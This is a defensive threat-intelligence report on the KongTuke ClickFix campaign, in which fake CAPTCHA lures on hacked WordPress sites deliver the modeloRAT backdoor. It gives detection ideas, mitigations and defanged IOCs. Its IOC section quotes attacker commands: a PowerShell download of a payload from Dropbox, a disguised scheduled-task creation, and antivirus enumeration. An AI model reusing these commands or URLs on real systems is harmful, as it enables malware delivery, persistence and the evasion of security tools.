Through the Lens of MDR: Analysis of KongTuke’s ClickFix Abuse of Compromised WordPress Sites

Key Takeaways

• KongTuke uses compromised WordPress sites and fake CAPTCHA lures (ClickFix) to trick users into executing malicious commands.
• The attack abuses legitimate tools like PowerShell, finger.exe, and Dropbox to deploy a Python-based backdoor known as modeloRAT.
• The malware performs environment validation, specifically checking for corporate domain membership and security tools, indicating a focus on enterprise environments.
• Persistence is established via Registry Run keys ('monitoringservice') and Scheduled Tasks disguised as a 'SoftwareProtection' service.
• The threat actor is diversifying entry techniques, utilizing both CrashFix (malicious browser extensions) and ClickFix methods to deliver the same payload.

Affected Systems

• Windows
• WordPress

Attack Chain

The attack begins when a user visits a compromised WordPress site and is presented with a fake CAPTCHA lure (ClickFix). The user is socially engineered into copying and executing a malicious command via the Run dialog, which abuses finger.exe to download and execute an obfuscated PowerShell loader. This loader performs environment checks, enumerates security tools, and if the host is domain-joined, downloads a portable Python environment and the modeloRAT payload from Dropbox. The RAT establishes persistence via Registry Run keys and a Scheduled Task, and communicates with C2 servers (including Telegram infrastructure) for further remote access and data exfiltration.

Detection Availability

• YARA Rules: No
• Sigma Rules: No
• Snort/Suricata Rules: No
• KQL Queries: No
• Splunk SPL Queries: No
• EQL Queries: No
• Other Detection Logic: Yes
• Platforms: TrendAI Vision One

The article provides specific hunting queries for TrendAI Vision One to detect ModeloRAT malware detections and the creation of the malicious 'SoftwareProtection' scheduled task.

Detection Engineering Assessment

EDR Visibility: High — The attack relies heavily on process execution (cmd, powershell, finger.exe, pythonw.exe), file creation in AppData, and registry/scheduled task modifications, all of which are highly visible to modern EDRs. Network Visibility: Medium — Initial C2 uses HTTP/HTTPS and Telegram APIs, which blend with normal traffic, but the use of finger.exe for external connections is highly anomalous. Detection Difficulty: Moderate — While the initial payload is obfuscated and uses legitimate tools (LOLBins), the behavioral chain (finger.exe making network connections, dropping portable Python environments) is distinct and detectable.

Required Log Sources

• Process Creation (Event ID 4688 / Sysmon 1)
• File Creation (Sysmon 11)
• Registry Events (Sysmon 12/13/14)
• Scheduled Task Creation (Event ID 4698)
• Network Connections (Sysmon 3)

Hunting Hypotheses

Hypothesis	Telemetry	ATT&CK Stage	FP Risk
Look for finger.exe making outbound network connections or being copied to temporary directories.	Process Creation, Network Connections	Execution	Low
Monitor for PowerShell executing hidden, non-interactive commands that download files from Dropbox and extract ZIP archives to AppData.	Process Creation, Command Line Logging	Execution	Medium
Detect the creation of scheduled tasks named 'SoftwareProtection' executing Python scripts from the AppData directory.	Scheduled Task Creation, Process Creation	Persistence	Low
Identify pythonw.exe executing scripts from unusual directories like AppData\Roaming\WPy64-31401.	Process Creation	Execution	Low

Control Gaps

• Lack of application control preventing portable Python execution from user directories.
• Insufficient outbound network filtering for LOLBins like finger.exe.

Key Behavioral Indicators

• finger.exe copied to %temp%
• PowerShell querying AntivirusProduct via WMI
• pythonw.exe running modes.py or extentions.py
• Registry Run key named 'monitoringservice'

False Positive Assessment

• Low

Recommendations

Immediate Mitigation

• Block known C2 IP addresses and domains at the firewall/proxy.
• Search for and remove the 'SoftwareProtection' scheduled task and 'monitoringservice' registry key.
• Isolate hosts exhibiting finger.exe network activity or running portable Python from AppData.

Infrastructure Hardening

• Harden WordPress installations by updating core files, themes, and plugins to prevent site compromise.
• Implement Application Control to block unauthorized execution of portable interpreters like Python from user directories.
• Restrict outbound network access for built-in Windows utilities (LOLBins) that do not require it.

User Protection

• Deploy EDR solutions configured to alert on suspicious PowerShell and LOLBin activity.
• Implement web filtering to block access to newly registered or low-reputation domains.

Security Awareness

• Educate users about the ClickFix/fake CAPTCHA technique, emphasizing that legitimate sites will never ask them to copy and paste commands into the Run dialog or PowerShell.

MITRE ATT&CK Mapping

• T1189 - Drive-by Compromise
• T1566 - Phishing
• T1059.001 - Command and Scripting Interpreter: PowerShell
• T1059.003 - Command and Scripting Interpreter: Windows Command Shell
• T1059.006 - Command and Scripting Interpreter: Python
• T1204.002 - User Execution: Malicious File
• T1218 - System Binary Proxy Execution
• T1053.005 - Scheduled Task/Job: Scheduled Task
• T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder
• T1057 - Process Discovery
• T1518.001 - Security Software Discovery
• T1082 - System Information Discovery
• T1033 - System Owner/User Discovery
• T1069.001 - Permission Groups Discovery: Local Groups
• T1069.002 - Permission Groups Discovery: Domain Groups
• T1049 - System Network Connections Discovery
• T1018 - Remote System Discovery
• T1482 - Domain Trust Discovery
• T1071.001 - Application Layer Protocol: Web Protocols
• T1140 - Deobfuscate/Decode Files or Information

Additional IOCs

• Ips:
  • 162[.]33[.]178[[.]]171 - IP address hosting the malicious injected script foodgefy[.]com.
  • 158[.]247[.]252[.]178 - External IP contacted by the pythonw.exe process (modeloRAT C2).
  • 170[.]168[.]103[.]208 - External IP contacted by the pythonw.exe process (modeloRAT C2).
  • 149[.]154[.]164[.]13 - IP associated with Telegram infrastructure, used as a C2 channel.
• Domains:
  • foodgefy[[.]]com - Domain hosting malicious injected JavaScript.
  • ainttby[[.]]com - Domain hosting malicious injected JavaScript.
  • ctpsih[[.]]com - Domain hosting malicious injected JavaScript.
• Urls:
  • hxxps://ainttby[[.]]com/6f54[.]js - Injected malicious JavaScript reference.
  • hxxps://ctpsih[[.]]com/2d5h[.]js - Injected malicious JavaScript reference.
  • hxxp://45[.]61[.]138[[.]]224/n - HTTP POST endpoint used by the PowerShell loader for C2 communication and environment validation.
  • hxxps://www[.]dropbox[.]com/scl/fi/np4h0kexqq5r9vlpzwg4d/rp?rlkey=fwg1koexylntccobyxaliju7w&st=3wxzp44k&dl=1 - Dropbox URL used to download the extentions.py payload.
  • hxxps://www[.]dropbox[.]com/scl/fi/q7lv7u1y06okwokmjshy7/1.zip?rlkey=gly5frkxxrkny2gdifmw7jy2i&st=5qo0r6u7&dl=1 - Dropbox URL used to download the portable Python environment (Winpython.zip).
• File Hashes:
  • 1c6adc9cba94d2ff144dd62452d28fc609d58bb9 (SHA1) - Hash of pythonw.exe / run.exe dropped in the SoftwareProtectionPlatform folder.
  • 0ef8b7beb27d871beec2b6a645b0054f4528491f2d2a2f8084daf3cbfa71bc72 (SHA256) - Hash of pythonw.exe / run.exe dropped in the SoftwareProtectionPlatform folder.
• Registry Keys:
  • HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU - Registry key showing the execution of the initial malicious command via the Run dialog.
• File Paths:
  • %temp%\ct.exe - Temporary file path where finger.exe is copied and executed.
  • %AppData%\script.ps1 - Second-stage PowerShell script downloaded and executed by the loader.
  • $env:appdata\Winpython.zip - ZIP archive containing the portable Python distribution.
  • $env:appdata\WPy64-31401\python\pythonw.exe - Portable Python executable used to run modeloRAT.
  • $env:appdata\WPy64-31401\python\extentions.py - Additional Python payload downloaded by modeloRAT.
  • C:\Users\<USERNAME>\AppData\Local\Microsoft\Windows\SoftwareProtectionPlatform\run.exe - Executable used in the scheduled task for persistence.
  • C:\Users\<USERNAME>\AppData\Local\Microsoft\Windows\SoftwareProtectionPlatform\udp.pyw - Obfuscated Python script executed by the scheduled task.
  • C:\Users\<USERNAME>\AppData\Local\Microsoft\Windows\SoftwareProtectionPlatform\run.pyw - Obfuscated Python script containing the persistent backdoor bytecode.
  • C:\Windows\System32\Tasks\SoftwareProtection - File path of the malicious scheduled task.
• Command Lines:
  • Purpose: Initial execution via Run dialog to copy and execute finger.exe for payload retrieval. | Tools: cmd.exe, finger.exe | Stage: Execution
  • Purpose: Download and execute the portable Python environment from Dropbox. | Tools: powershell.exe | Stage: Execution | iwr -Uri "https://www.dropbox.com/..." -OutFile "$env:appdata\Winpython.zip"
  • Purpose: Create a scheduled task for persistence disguised as a legitimate service. | Tools: schtasks.exe | Stage: Persistence | schtasks.exe /create /tn SoftwareProtection /tr
  • Purpose: Enumerate installed antivirus products via WMI. | Tools: powershell.exe, WMI | Stage: Discovery | Get-CimInstance -Namespace root/SecurityCenter2 -ClassName AntivirusProduct
• Other:
  • SoftwareProtection - Name of the malicious scheduled task created for persistence.